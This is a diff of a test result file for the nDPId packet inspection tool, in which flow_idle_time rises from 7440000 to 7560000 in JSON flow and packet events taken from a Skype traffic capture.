00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1431969677439,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969677439,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kxIAAEARaE7AqAEib91NpjLdnEsAK\/dAnFQCl1hxbJqFe\/EoPOrYejcO5KpAaYBpd\/JMh2XsR696PgE="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"skype.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969677439,"flow_last_seen":1431969677439,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969677439,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.166","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -553,8 +553,8 @@ 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":965,"source":"skype.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969678448,"flow_last_seen":1431969678448,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969678448,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.26","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":2,"flow_last_seen":1431969679026,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679026,"pkt":"0NQSxnP1PBXCt3IOCABFAABLE+cAAEAR40fAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":971,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":2,"flow_last_seen":1431969679027,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969679027,"pkt":"0NQSxnP1PBXCt3IOCABFAABL8bEAAEARBX3AqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679451,"flow_last_seen":1431969679451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969679451,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50065,"dst_port":40031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1431969679451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969679451,"pkt":"0NQSxnP1PBXCt3IOCABFAABAZ+RAAEAG8MXAqAEiQTffDMORnF\/vfD8JAAAAALAC\/\/9szQAAAgQFtAEDAwUBAQgKPiMbhwAAAAAEAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zKQAAEARzHXAqAEinTeClzLdnFEAJhOjnF4CtwUXw\/VWCApVJdrfxkhI5qU9AKuGw3faL7f5"} 
00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":976,"source":"skype.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.151","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -564,8 +564,8 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1431969679455,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969679455,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7lc0AAEARZY3AqAEib91NsDLdnFQAJ2jKnGICi6AMRljZtq+Es\/pWkLbSJ\/TvDoZrPj0F5hXOgQ=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":978,"source":"skype.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969679455,"flow_last_seen":1431969679455,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969679455,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.176","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":979,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":2,"flow_last_seen":1431969679581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969679581,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIpxfw5E\/Sv9r73w\/CqASOJDLRwAAAgQFrAQCCApNoe2VPiMbhwEDAwk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"skype.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":3,"flow_last_seen":1431969679581,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969679581,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0cmZAAEAG5k\/AqAEiQTffDMORnF\/vfD8KP0r\/bIAQECwh8QAAAQEICj4jHAhNoe2V"} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"skype.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLe\/oAAEARezTAqAEiwKgBAeRaADUAN2o90\/0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"skype.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":3,"flow_last_seen":1431969680121,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969680121,"pkt":"0NQSxnP1PBXCt3IOCABFAABLZ0MAAEARj+vAqAEiwKgBAcDQADUANww\/OoYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":995,"source":"skype.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -574,12 +574,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_packet_id":1,"flow_last_seen":1431969680467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969680467,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyVhkAAEAR2gHAqAEinTfrnjLdnF8AHti+nGYCSGBvJFR\/HGq\/K9Cny1\/vxLQHiA=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"skype.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969680467,"flow_last_seen":1431969680467,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969680467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.158","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431969681195,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ayJAAEAG7ZPAqAEiQTffDMOSAbvQogCrbPVBKoAQECyijAAAAQEICj4jIk9Noe8n"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681060,"flow_last_seen":1431969681060,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681060,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.12","src_port":50066,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":1,"flow_last_seen":1431969681060,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681060,"pkt":"0NQSxnP1PBXCt3IOCABFAABA2fpAAEAGfq\/AqAEiQTffDMOSAbvQogCqAAAAALAC\/\/9eaAAAAgQFtAEDAwUBAQgKPiMhyQAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1431969681195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681195,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYa5BN98MwKgBIgG7w5Js9UEp0KIAq6ASOJBL6AAAAgQFrAQCCApNoe8nPiMhyQEDAwk="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"skype.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1431969681195,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ayJAAEAG7ZPAqAEiQTffDMOSAbvQogCrbPVBKoAQECyijAAAAQEICj4jIk9Noe8n"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.160","src_port":50067,"dst_port":40027,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1010,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAABA\/b9AAEAGpVbAqAEinTc4oMOTnFuhu64eAAAAALAC\/\/+OBAAAAgQFtAEDAwUBAQgKPiMjagAAAAAEAgAA"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4YcMAAEARzb3AqAEi1cezojLdnF0AJAuMnGgC2mPP3NT+NgZcfouOKEVgI\/tI0sJfUuMhDA=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1011,"source":"skype.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.162","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -589,26 +589,26 @@ 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1431969681480,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969681480,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyaGwAAEARx63AqAEinTfrnzLdnFUAHmVKnGwCxXHmKlMo0hJpMwmU59yIG9tJmA=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1013,"source":"skype.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969681480,"flow_last_seen":1431969681480,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969681480,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.159","src_port":13021,"dst_port":40021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1015,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":2,"flow_last_seen":1431969681627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969681627,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBqdNzigwKgBIpxbw5OkoMOPobuuH6ASOJAefQAAAgQFrAQCCApNfpJAPiMjagEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"skype.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":3,"flow_last_seen":1431969681627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969681627,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mLVAAEAGCm3AqAEinTc4oMOTnFuhu64fpKDDkIAQECx1FQAAAQEICj4jI\/xNfpJA"} 
